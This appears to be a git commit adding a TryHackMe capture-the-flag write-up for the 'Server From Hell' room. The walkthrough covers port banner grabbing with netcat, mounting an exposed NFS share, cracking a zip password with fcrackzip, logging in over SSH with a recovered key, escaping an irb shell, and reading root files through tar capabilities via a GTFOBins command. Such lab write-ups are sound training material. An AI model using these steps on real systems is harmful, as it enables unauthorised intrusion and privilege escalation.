Add files via upload

2024-11-10 06:34:17 +00:00 · 2020-11-03 23:43:42 +05:00 · 2020-11-03 23:43:42 +05:00 · f358a0616f
commit f358a0616f
parent 8ef9098229
1 changed files with 161 additions and 0 deletions
--- a/TryHackMe/Server_From_Hell.md
+++ b/TryHackMe/Server_From_Hell.md
@ -0,0 +1,161 @@
+# TryHackMe-Server From Hell
+
+> Abdullah Rizwan | 05:54 PM | 3rd November ,2020
+
+## NMAP
+
+```
+Not shown: 94 closed ports
+PORT      STATE SERVICE               VERSION
+1/tcp     open  tcpmux?
+| fingerprint-strings: 
+|   NULL: 
+|_    550 12345 0000000000000000000000000000000000000000000000000000000
+3/tcp     open  compressnet?
+| fingerprint-strings: 
+|   NULL: 
+|_    550 12345 0000000000000000000000000000000000000000000000000000000
+4/tcp     open  unknown
+| fingerprint-strings: 
+|   NULL: 
+|_    550 12345 0000000000000000000000000000000000000000000000000000000
+6/tcp     open  unknown
+........
+
+There were many ports open in this box so can't really show how many ports were there
+```
+
+Looking at the description of the room it says about starting from `1337` ,so
+
+## PORT 1337
+
+`nc IP:1337`
+
+```
+Welcome traveller, to the beginning of your journey
+To begin, find the trollface
+Legend says he's hiding in the first 100 ports
+Try printing the banners from the ports
+
+```
+This is the message we get when we connect to port 1337
+
+I made a simple script to go over 100 ports and connect to it to grab banner
+
+
+```
+i=1
+while [ $i -ne 100 ]
+do 
+	nc 10.10.173.96 $i
+	i=$(( $i + 1 ))
+done
+
+```
+<img src="https://imgur.com/X2RBWne.png"/>
+
+
+## PORT 12345
+
+```
+nc 10.10.173.96 12345
+NFS shares are cool, especially when they are misconfigured
+It's on the standard port, no need for another scan
+```
+
+## PORT 2049
+
+The default port of `nfs` share is 2049 so lets see if there are any shares that we can mount on our local machine
+
+<img src="https://imgur.com/ZsfnVwC.png"/>
+
+Now let's mount that share
+
+<img src="https://imgur.com/SDYKjPV.png"/>
+
+We only find a `backup.zip`
+
+<img src="https://imgur.com/VVLeFOp.png"/>
+
+But it asks for a password
+
+<img src="https://imgur.com/PdxqCba.png"/>
+
+### Fcrackzip
+
+Now lets use this to bruteforce archive's password
+
+```
+fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip 
+
+
+PASSWORD FOUND!!!!: pw == zxcvbnm
+```
+<img src="https://imgur.com/mqLJMVD.png"/>
+
+But I can't get to extract the files becasue `read-only file system` , so I used GUI to view what was in these files
+
+<img src="https://imgur.com/0aJE2Xt.png"/>
+
+And I was able to grab the flag,hint and ssh private key.
+
+
+Now `hint.txt` says
+
+```
+2500-4500
+```
+
+I tried to ssh into the box using `hades` private but ssh port was not on 22
+
+<img src="https://imgur.com/PfSORcz.png"/>
+
+From the results of the scan I searched for ssh with openssh client
+
+<img src="https://imgur.com/mgG3s7s.png"/>
+
+And was logged in :D
+
+<img src="https://imgur.com/2j3o2wy.png"/>
+
+```
+ Welcome to hell. We hope you enjoy your stay!
+ irb(main):001:0> puts 'hello'
+hello
+=> nil
+irb(main):002:0> 
+
+```
+
+Now this `irb` is interactive ruby shell just like we get in python so in order to get a `/bin/bash` shell run 
+
+```
+exec '/bin/bash'
+```
+
+<img src="https://imgur.com/TagPPFG.png"/>
+
+## Privilege Escalation
+
+Now the room gives us a hint about `getcap` this command tells that which file or binary has capability to access almost anything on the system so run 
+
+`getcap -r 2>/dev/null` (2>/dev/null ,here 2 just redirects Standard output error to null )
+
+
+```
+hades@hell:~$ getcap -r / 2>/dev/null
+/usr/bin/mtr-packet = cap_net_raw+ep
+/bin/tar = cap_dac_read_search+ep
+```
+Visiting `GTFOBINS`
+
+https://gtfobins.github.io/gtfobins/tar/
+```
+hades@hell:~$ tar xf /root/root.txt -I '/bin/sh -c "cat 1>&2"'
+thm{w0w_n1c3_3sc4l4t10n}
+hades@hell:~$ 
+
+```
+
+
+